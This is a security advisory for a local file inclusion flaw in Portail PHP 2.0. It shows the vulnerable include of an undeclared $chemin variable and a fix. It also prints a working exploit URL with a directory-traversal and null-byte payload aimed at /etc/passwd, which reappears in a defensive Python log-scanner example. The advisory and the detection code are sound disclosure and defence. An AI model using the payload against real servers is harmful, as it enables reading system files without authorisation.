Portail PHP version 2.0 suffers from a local file inclusion vulnerability.
[START]
#########################################################################################
[0x01] Information:
Script : Portailphp 2.0
Download : http://www.safari-msi.com/portailphp/mod_file/upload/PortailPHP-v2.0.zip
Vulnerability : Local File Inclusion
Author : Osirys
Contact : osirys[at]live[dot]it
Website : http://osirys.org
Notes : Proud to be Italian
Greets : XaDoS, x0r, emgent, Jay, str0ke. Especially to: AlpHaNiX
#########################################################################################
[0x02] Bug:[Local File Inclusion]
######
Bugged file is: /[path]/i-accueil.php
[CODE]
<?php
/*
PORTAILPHP
*/
echo "<table width='100%'><tr><td>";
echo "<img border='0' src='themes/" . $_SESSION["App_Theme"] . "/ico-fleche01.gif' alt=''>
Bienvenue sur <strong>$App_Me_Titre</strong><br /><br />" ;
include("$chemin/mod_news/index.php");
echo "</td></tr></table>";
?>
[/CODE]
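$chemin is not declared in this file, so when i-accueil.php is requested directly we can set its value from GET (PHP allows this when register_globals is enabled).
[!] FIX: Just declare $chemin, or leave it out of the include path, because it's not necessary.
i-accueil.php sits in the application root, as does the mod_news/ directory.
Secure include (path fixed relative to this file, no request input): include(dirname(__FILE__) . "/mod_news/index.php");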
[!] EXPLOIT: /[path]/i-accueil.php?chemin=[local_file_to_include]
../../../../../../../../../../../etc/passwd%00
#########################################################################################
[/END]
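For defenders, requests matching the pattern in section [0x02] can be found in web-server access logs, since a legitimate client never needs to send chemin to i-accueil.php. The Python below is an added example, not part of the original advisory or of Portail PHP; it assumes common/combined log format, and the /portail/ install path and all log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a common/combined-format access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample entries (documentation IP ranges, assumed /portail/ install path).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2009:10:00:00 +0000] "GET /portail/index.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2009:10:00:02 +0000] "GET /portail/i-accueil.php HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2009:10:03:11 +0000] "GET /portail/i-accueil.php?chemin=../../../../etc/passwd%00 HTTP/1.1" 200 1543',
    '198.51.100.7 - - [01/Jan/2009:10:03:15 +0000] "GET /portail/i-accueil.php?chemin=. HTTP/1.1" 200 812',
]

def chemin_findings(line):
    """Return the reasons a log line is suspicious; an empty list means clean."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    target = urlsplit(match.group("target"))
    if not target.path.lower().endswith("/i-accueil.php"):
        return []
    # parse_qsl percent-decodes once, as PHP does when it fills $_GET.
    values = [v for n, v in parse_qsl(target.query, keep_blank_values=True)
              if n == "chemin"]
    if not values:
        return []
    # The script never needs chemin from the client, so its presence is a finding.
    reasons = ["client-supplied chemin"]
    if any("../" in v.replace("\\", "/") for v in values):
        reasons.append("directory traversal")
    if any("\x00" in v for v in values):
        reasons.append("null byte")
    return reasons

def scan(lines):
    """Map 1-based line numbers to findings for every suspicious line."""
    return {n: f for n, line in enumerate(lines, 1) if (f := chemin_findings(line))}

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG).items():
        print(number, ", ".join(findings))
```

Only the request line is inspected, so values sent in a POST body or a cookie do not appear in this kind of log and need a different data source.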